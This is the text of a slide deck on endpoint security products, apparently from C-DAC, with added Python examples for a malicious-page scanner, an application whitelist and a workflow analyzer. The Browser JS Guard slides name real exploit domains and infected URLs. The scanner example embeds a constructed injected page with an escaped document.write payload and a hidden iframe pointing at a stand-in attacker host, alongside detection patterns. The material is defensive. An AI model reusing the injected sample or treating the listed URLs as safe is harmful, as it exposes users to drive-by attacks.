endpoint security solutions

Post on 11-Jan-2022


Endpoint Security Solutions

• USB Pratirodh
• Browser JS Guard
• AppSamvid
• Malware Nivarak
• Malware Resist
• Application and Device Control
• Workflow Analyser

USB Pratirodh

Protects from unauthorized usage of USB devices

Highlights of USBPratirodh

Blocking and unblocking of USB mass storage devices such as cameras, pen drives, mobiles, printers, external hard disks, etc.

Encryption and decryption of files and folders.

Virus detection and Autorun protection

User Authentication (only registered devices can be authenticated)

Verified and Certified by STQC

Highlights of USBPratirodh

Supports Windows (XP SP3, Vista, 7, 8)

Sold licenses to IRISET, ISRO, ECIL, Heavy water plant, Headquarters 9 corps and C-DAC Mumbai.

Deployed at NAVY, DRDO, CERT-IN, CDAC-Bengaluru.

Salient Features and Benefits

Whitelisting of USB Devices

User Authentication for accessing USB Devices

Malware Detection in USB storage Devices

Data Encryption for USB Storage Devices

List of Attacks Addressed

Protect Against misuse of USB Devices

Protect against malware executing from USB Devices

Encryption protects data in case the device is lost

Hardware and Software Requirements

Microsoft Windows XP(SP3) and above.

Recommended 100 MB of Hard disk space.

Snapshots


Potential user agencies / organizations

Any computer user or organization

Browser JS Guard

Add-on for browsers to protect from JavaScript based malware

Highlights of the Product

Detected malware that had not been detected by any other anti-malware solution.

Validated and Certified by CERT-In

Real-time code injection detection and prevention in web pages

Everything we capture is happening in the wild (there is no theory)

Collects little data, and the data reported is of high value

Early warning and prevention

Automatic product updates via Internet

Designed as a browser extension and available in popular web browser repositories

Consumption of minimal resources


Salient Features

Content/Heuristic based JS & HTML Malware protection

Alerts the User on visiting Malicious Web pages

Provides detailed analysis of webpage threats

Ease of installation

Compatible Web Browsers

Web Browser Name     Compatible with Version   Supported OS
Firefox              >= 14.0                   Windows & Linux
Google Chrome        >= 14.0                   Windows & Linux
Iceweasel            >= 21.0                   Windows & Linux
Opera                >= 11.0                   Windows & Linux
Internet Explorer    = 9.0                     Windows

Value of the Product

Detects

– Client side Redirections

– Redirections through DOM changing functions

– Runtime JavaScript Code Injections

Malicious Web Page Analysis and Detection through

Browser JS Guard

Malicious Redirection Attack Vectors

Possible vectors are

– Hidden Activities

– Obfuscated JavaScript code

– Unauthorized Redirections

Detection of Hidden Activities

Exploits Through “brenz.pl”

www.brenz.pl - an exploit site pre-loaded with an exploit kit called Eleonore. It is a dangerous domain specially created to propagate rogue programs, Trojan horses and browser hijackers, and it can lead to system freezes.

It may even cause identity theft, financial loss and permanent file deletion.

The main Indian site of Moneycontrol.com was compromised and injected with malicious code on November 6, 2010. The injected code redirected users to an exploit website “brenz.pl”.

Example URL is http://www.tradersbay.in/login.php

Browser JS Guard - Detection of brenz.pl based attacks


Exploits Through “xanjan.cn”

www.xanjan.cn - collects passwords from the site when a user logs into their account.

– Example infected URL is

• http://compass.co.in/achieve2003-2004.php

• Infection present in this website is

Browser JS Guard - Detection of xanjan.cn based attacks

Detection of Obfuscated JavaScript Code based Attacks

Drive by Download Attack

http://feeds.feedburner.com/bileblog is an infected URL. It drops a JavaScript Trojan. This URL performs the following redirection chain:

▪ Intermediate redirection: hxxp://rsnvlbgcba.ibiz.cc/d/404.php?go=1

▪ Final redirection: hxxp://fukbb.com/

Analysis – Obfuscated Code

Analysis – De Obfuscated Code

Analysis

The de-obfuscated code loads an iframe into the victim’s browser, which redirects the user to ‘hxxp://rsnvlbgcba.ibiz.cc/d/404.php?go=1’, which in turn redirects to ‘hxxp://fukbb.com/’.

The source code hosted at the intermediate site is a simple redirect.
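The indicators the slides list for Browser JS Guard (hidden activities, obfuscated script, unauthorized cross-domain redirections, and the hidden-iframe redirection chain analysed above) can be illustrated with a small content-heuristic scanner. This is an added example, not C-DAC's code or the extension's actual rules; the regexes, the escape-count threshold, the page URL and both sample pages are constructed for illustration.

```python
"""Heuristic page-content scanner for the indicators the slides attribute to
Browser JS Guard: hidden iframes, cross-domain iframes and redirections, and
obfuscated script.  Added example, not C-DAC's code; every rule, threshold
and sample page below is a constructed illustration."""
import re
from urllib.parse import urlparse

# Hidden iframe: zero width/height or hidden via inline style.
HIDDEN_IFRAME = re.compile(
    r"<iframe[^>]*?(?:width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b|"
    r"display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>", re.I)
IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc\s*=\s*[\"']([^\"']+)", re.I)
# Script- or meta-refresh-driven navigation to an absolute URL.
REDIRECT = re.compile(
    r"(?:location(?:\.href)?\s*=\s*|location\.replace\(\s*|url=)"
    r"[\"']?(https?://[^\"'\s)>]+)", re.I)
# Obfuscation indicators: decoder/writer calls fed by many escape sequences.
OBF_CALLS = re.compile(r"\b(eval|unescape|String\.fromCharCode|document\.write)\s*\(", re.I)
ESCAPES = re.compile(r"%[0-9a-f]{2}|\\x[0-9a-f]{2}|\\u[0-9a-f]{4}", re.I)
ESCAPE_THRESHOLD = 8   # constructed threshold; tune on a real corpus


def site_key(url):
    """Crude registrable-domain key: last two labels of the host (no public-suffix list)."""
    host = (urlparse(url).hostname or "").lower()
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def scan_page(page_url, html):
    """Return a list of (rule, target) findings for the HTML served at page_url."""
    origin = site_key(page_url)
    findings = []
    for m in HIDDEN_IFRAME.finditer(html):
        src = IFRAME_SRC.search(m.group(0))
        findings.append(("hidden_iframe", src.group(1) if src else None))
    for m in IFRAME_SRC.finditer(html):
        if site_key(m.group(1)) != origin:
            findings.append(("cross_domain_iframe", m.group(1)))
    for m in REDIRECT.finditer(html):
        if site_key(m.group(1)) != origin:
            findings.append(("cross_domain_redirect", m.group(1)))
    calls = {c.lower() for c in OBF_CALLS.findall(html)}
    if calls and len(ESCAPES.findall(html)) >= ESCAPE_THRESHOLD:
        findings.append(("obfuscated_script", ",".join(sorted(calls))))
    return findings


# Constructed sample pages: a clean page and the same page with an injected
# hidden iframe, an escaped document.write payload and a meta-refresh hop.
PAGE_URL = "https://shop.example.com/index.html"
BENIGN_HTML = """<html><body><h1>Welcome</h1>
<script>document.getElementById('msg').innerHTML = 'hello';</script>
<a href="https://shop.example.com/login">login</a>
<iframe src="https://shop.example.com/help" width="300" height="200"></iframe>
</body></html>"""
INJECTED_HTML = BENIGN_HTML.replace("</body>", """
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fattacker.test%2Fgo%22%20width%3D0%20height%3D0%3E'));</script>
<iframe src="http://attacker.test/exploit.php?go=1" width="0" height="0" style="display:none"></iframe>
<meta http-equiv="refresh" content="0;url=http://second-hop.test/">
</body>""")

if __name__ == "__main__":
    for name, html in (("benign", BENIGN_HTML), ("injected", INJECTED_HTML)):
        print(name, scan_page(PAGE_URL, html))
```

The scanner is static and deliberately narrow: it flags the page as a whole only when a decoder call and a dense escaped payload occur together, so ordinary pages with a single `document.write` are not alerted on, and cross-domain checks use a two-label host key, which over-merges sites on multi-label public suffixes.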

Final Redirected Page

Browser JS Guard - Detection of Obfuscated JavaScript Code

Detection of Unauthorized Redirection Attacks

Infected URL

foto.kku.in is the infected URL. It refers to malicious cross domains and attacks the user.

Browser JS Guard - Detection of Unauthorized Redirections

Detection Rate

Potential user agencies / organizations

Any end system user

AppSamvid

Application Whitelisting Solution

Features

Whitelists .exe, .dll, .sys, .war, .jar and .class files

Automatic whitelisting of Windows Updates

Potential updater file(s) identification for 3rd party software

Installation mode – supports installation of new software

– Allows updating of applications

Folder scan option to add applications to database

Password based access to GUI

Password based uninstallation
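The features listed above (controlled file types, a folder scan that populates the whitelist database, and an installation mode for adding new software) can be modelled as a hash-based whitelist. The block below is an added example and not AppSamvid's code: it replaces the kernel-mode mini-filter hook with a plain `decide()` call, uses SHA-256 as an assumed hash algorithm, and builds its sample files in a temporary directory.

```python
"""Hash-based application whitelist modelled on the AppSamvid feature list
(controlled file types, folder scan to populate the database, installation
mode for new software).  Added example, not C-DAC's code; the mini-filter
driver hook is replaced by a plain decide() call and the files are constructed."""
import hashlib
import tempfile
from pathlib import Path

# File types the slide lists as whitelisted.
CONTROLLED_SUFFIXES = {".exe", ".dll", ".sys", ".war", ".jar", ".class"}


def sha256_file(path):
    """Stream the file through SHA-256 (assumed algorithm) and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


class Whitelist:
    def __init__(self):
        self.hashes = {}            # sha256 -> path first recorded
        self.installation_mode = False
        self.log = []               # (file name, short hash, verdict)

    def scan_folder(self, folder):
        """Folder scan option: add every controlled file below folder; returns count added."""
        added = 0
        for p in sorted(Path(folder).rglob("*")):
            if p.is_file() and p.suffix.lower() in CONTROLLED_SUFFIXES:
                digest = sha256_file(p)
                if digest not in self.hashes:
                    self.hashes[digest] = str(p)
                    added += 1
        return added

    def decide(self, path):
        """Verdict for an execute/load attempt on path: 'allow' or 'deny'."""
        p = Path(path)
        if p.suffix.lower() not in CONTROLLED_SUFFIXES:
            return "allow"          # outside the controlled file types
        digest = sha256_file(p)
        if digest in self.hashes:
            verdict = "allow"
        elif self.installation_mode:
            self.hashes[digest] = str(p)   # installation mode learns the new binary
            verdict = "allow"
        else:
            verdict = "deny"        # unknown binary: blocked by default
        self.log.append((p.name, digest[:12], verdict))
        return verdict


def demo():
    """Build a constructed install folder, exercise the policy and return the verdicts."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "app").mkdir()
        (root / "app" / "good.exe").write_bytes(b"MZ constructed good binary")
        (root / "app" / "lib.dll").write_bytes(b"MZ constructed library")
        (root / "app" / "readme.txt").write_bytes(b"not executable content")
        wl = Whitelist()
        scanned = wl.scan_folder(root / "app")
        dropper = root / "dropper.exe"              # appears after the scan
        dropper.write_bytes(b"MZ constructed unknown binary")
        verdicts = {"scanned": scanned,
                    "known": wl.decide(root / "app" / "good.exe"),
                    "text": wl.decide(root / "app" / "readme.txt"),
                    "unknown": wl.decide(dropper)}
        wl.installation_mode = True                 # administrator installs new software
        verdicts["install"] = wl.decide(dropper)
        wl.installation_mode = False
        verdicts["after"] = wl.decide(dropper)      # now whitelisted by hash
        return verdicts


if __name__ == "__main__":
    print(demo())
```

Keying the database on content hashes rather than paths is what makes the deny verdict for the unknown `dropper.exe` meaningful: a file copied over a whitelisted path with different contents would still be denied.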

1/23/2015 C-DAC 39

List of Attacks Addressed

Protects against

– Zero day attacks

– Trojans


Technical Architecture


Hardware and Software Requirements

No extra hardware required

Works with Microsoft Windows

– XP SP3 onwards

– Requires approximately 5 MB to 25 MB of free hard disk space

Requires mini-filter driver support by Microsoft Windows


Snapshot – Home screen


Snapshot – Edit screen


Snapshot – Settings screen


Snapshot – Logs screen


Potential user agencies

Industrial Control Systems

ATMs (Automated Teller Machines)

Point of Sale systems

Small Business Users


Malware Nivarak

Application Behaviour Whitelisting

Objectives

Detects deviations at runtime from normal behaviour of modelled applications

Features

Ability to prevent Zero-day attacks on modelled applications via

– File access Monitor

– Registry access Monitor

Co-exists with other Anti-virus solutions

Integrated Malware Resist

Technical Architecture

[Architecture diagram; its labels are: Generate Model, Verify Model, Verification Policies, Application Behavioural Heuristic Policies, Trusted Models, Running Processes, Dynamic Model Enforcement, Dynamic Policy Enforcement, Execution (success), Un-trusted Application (failure), GUI (Threat Alert).]

Software Requirements

Microsoft Windows XP(SP3) and above.

Recommended 100 MB of Hard disk space.

Bundled Application Models

with installer

By default, Malware Nivarak is bundled with

– Adobe Acrobat Reader (8 and 10)

– MS Office 2007

– MS Excel

– MS Word

– MS PowerPoint

Supports model generation of other applications

– One can generate model and enforce them at runtime.

Other Software Measurements

Memory footprint: ~ 50 MB

Hard disk space: ~ 10 MB (depends on the applications model files)

Malware Resist

Process Execution Control

Details

Detects

– Malicious processes at runtime

Salient Features and Benefits

– Able to detect malware with its unique heuristic technology

– Capability to detect unknown malware

– Protects from the malware before it does any harm to your system

– Easy to use

– Even if your antivirus hasn’t detected a suspicious process, you can quarantine it

Malware Resist

• Classifies Processes (and monitors) in the system as

– Un-trusted

– User trusted processes

• Malicious behaviors which may cause damage to system

– 46 critical behaviors are monitored


Some of the behaviors monitored

Code injection attempts

Packed executables

Changing security rights

Attempts to disable system tools

Installing a hidden service

Hidden processes


Specifications

Processor - Pentium IV Processor onwards

RAM - 256 MB (recommended)

Hard Disk - 20 MB

OS - Windows XP SP2, SP3, Windows Vista

Application and Device Control

Manage Applications And USB Mass Storage Devices In Your Domain

Network

Introduction

ADC is a centralized management console to manage client components in a Windows Active Directory domain network

Integrates the following components

– AppSamvid functionality as Application Control

– Binary Heuristic Analysis

– Rootkit Detection Engine

– Browser JSGuard

– Malware Nivarak functionality as MPS

– USB Pratirodh functionality as Device Control

Features

SSL enabled Web based management console

Remote Deployment of client components – requires domain administrator privileges

Supports Batch Installation of remote clients

Centralized Logging – using MSMQ (Microsoft Message Queuing)

Graphical Log Analysis

Additional Features

Supports verifying application hashes with VirusTotal

Analysis of applications during scanning with heuristic application analyser

Supports Import/Export of whitelists

Remote registration of USB devices

Supports USB printers and scanners

Rootkit detection on Windows XP SP 2 and SP3 systems

Technical Architecture

[Architecture diagram; its labels are: Application Control Server, Device Control Server, Database (Whitelists/Policies: 1. Application whitelists, 2. Device control policies), Application Sandbox for Unknown Applications, Active Directory Environment, Client System, Application Control Agent, Device Control Agent, Remote Installation of Agent, Client-Server Communication (Scan Notification, Submit application details, Logs etc.), Enforcement of Policies.]

Minimum Hardware and Software Requirements

Server

– Windows Server 2008

– Active Directory Environment

– PostgreSQL 9.2

– Apache Web Server 2.2.x with PHP 5

– Minimum 500 MB hard disk space (1 GB recommended)

Client

– Microsoft Windows Vista and above

– Configured to use Active Directory

– Recommended 100 MB of hard disk space

Snapshots – Application Control

Snapshots – Device Control

Snapshots – Deploy components

Potential user agencies / organizations

Small to medium sized Enterprise networks

SCADA Environments

Work flow Analyzer

• Acts as an interceptor between the web server and the web client.

• Analyzes state-deviation attacks at runtime, during execution of the web application.

• Targeted attacks

– Authentication bypass

– Authorization bypass

– Sequence bypass

• Works in 2 phases

– Learning phase

– Detection phase

Work flow Analyzer

Learning Phase

Detection Phase
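The two phases described for the Workflow Analyzer (learn the application's normal request sequences, then flag authentication and sequence bypasses at runtime) can be shown as a small state-deviation model over request paths. This is an added example, not C-DAC's code: it assumes the interceptor sees each session as an ordered list of request paths, treats a request to an assumed `/login` path as the authentication event, and uses constructed training and test sessions.

```python
"""State-deviation model in the style of the Workflow Analyzer's two phases.
Added example, not C-DAC's code.  Assumptions: the interceptor hands us each
session as an ordered list of request paths, and a request to LOGIN_PATH is
the authentication event.  All sessions below are constructed."""

LOGIN_PATH = "/login"   # assumed authentication endpoint
START = "START"         # synthetic state before the first request


class WorkflowAnalyzer:
    def __init__(self):
        self.transitions = set()   # (previous_page, page) pairs observed while learning
        self.needs_auth = set()    # pages only ever reached after authentication

    def learn(self, sessions):
        """Learning phase: record allowed transitions and which pages sit behind login."""
        before_login, after_login = set(), set()
        for session in sessions:
            prev, logged_in = START, False
            for page in session:
                self.transitions.add((prev, page))
                (after_login if logged_in else before_login).add(page)
                if page == LOGIN_PATH:
                    logged_in = True
                prev = page
        self.needs_auth = after_login - before_login

    def detect(self, session):
        """Detection phase: return (page, reason) for every deviation in a live session."""
        alerts, prev, logged_in = [], START, False
        for page in session:
            if page in self.needs_auth and not logged_in:
                alerts.append((page, "authentication bypass"))
            elif (prev, page) not in self.transitions:
                alerts.append((page, "sequence bypass"))
            if page == LOGIN_PATH:
                logged_in = True
            prev = page
        return alerts


# Constructed benign sessions recorded during the learning phase.
TRAINING_SESSIONS = [
    ["/", "/login", "/account", "/logout"],
    ["/", "/catalog", "/login", "/cart", "/checkout", "/confirm"],
    ["/", "/catalog", "/login", "/cart", "/catalog", "/cart", "/checkout", "/confirm"],
]


def build_analyzer():
    """Train on the constructed sessions and return the analyzer ready for detection."""
    wa = WorkflowAnalyzer()
    wa.learn(TRAINING_SESSIONS)
    return wa


if __name__ == "__main__":
    wa = build_analyzer()
    for s in (["/", "/catalog", "/login", "/cart", "/checkout", "/confirm"],
              ["/", "/account"],
              ["/", "/login", "/confirm"]):
        print(s, "->", wa.detect(s) or "no deviation")
```

Authorization bypass would be handled the same way with the learned model keyed by role as well as by authentication state; that refinement is left out to keep the example to the two phases the slides describe. The learned model is only as good as the coverage of the learning phase, so a transition that legitimate users take rarely will produce a false "sequence bypass" until it has been observed.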

Thank You
